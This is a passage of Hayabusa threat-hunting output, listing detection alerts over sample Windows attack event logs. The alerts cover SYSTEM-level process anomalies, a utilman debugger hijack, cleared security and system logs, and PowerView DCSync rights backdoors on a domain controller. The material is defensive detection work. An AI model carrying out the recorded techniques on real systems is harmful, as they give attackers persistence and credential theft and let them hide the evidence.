Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.182 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.182 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.593 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.603 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-77C0-5C91-0000-00106C740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.603 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.623 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.623 +00:00,PC01.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.783 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.793 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.813 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 
365ABB72-77C4-5C91-0000-0010EA870100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.224 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.224 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.404 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.404 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.514 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 
365ABB72-781A-5C91-0000-001013CD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.514 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.544 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 365ABB72-7838-5C91-0000-0010E0D60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.544 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.594 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.594 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.654 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: 
C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 365ABB72-785E-5C91-0000-001031E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.654 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.725 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 1928 | PGUID: 365ABB72-785E-5C91-0000-00103FEA0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.805 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.835 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | PGUID: 
365ABB72-7874-5C91-0000-0010130B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.835 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.965 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.055 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.055 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.376 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 
365ABB72-78B1-5C91-0000-001001300200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.376 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.406 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:56.626 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:57.237 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:57.627 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: 
C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 365ABB72-78D0-5C91-0000-0010F6710200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:58.278 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:58.288 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 365ABB72-78D2-5C91-0000-0010FFAB0200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:58.489 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:58.989 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 
365ABB72-78D6-5C91-0000-0010CE170300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:19:04.187 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:19:10.796 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 365ABB72-78EE-5C91-0000-0010273F0400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:20:19.155 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 365ABB72-7933-5C91-0000-00100AD30600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:20:19.205 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:20:19.205 +00:00,PC01.example.corp,1,info,,Process 
Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:20:19.295 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:21:01.325 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:21:48.323 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:23:41.105 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 
365ABB72-79FC-5C91-0000-0010DBC60A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:24:08.294 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:34:25.894 +00:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx +2019-03-19 23:35:07.524 +00:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx +2019-03-25 09:09:14.916 +00:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-25 21:28:11.073 +00:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.022 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.022 
+00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.023 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.023 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.023 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.023 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.024 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.024 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.024 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.025 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
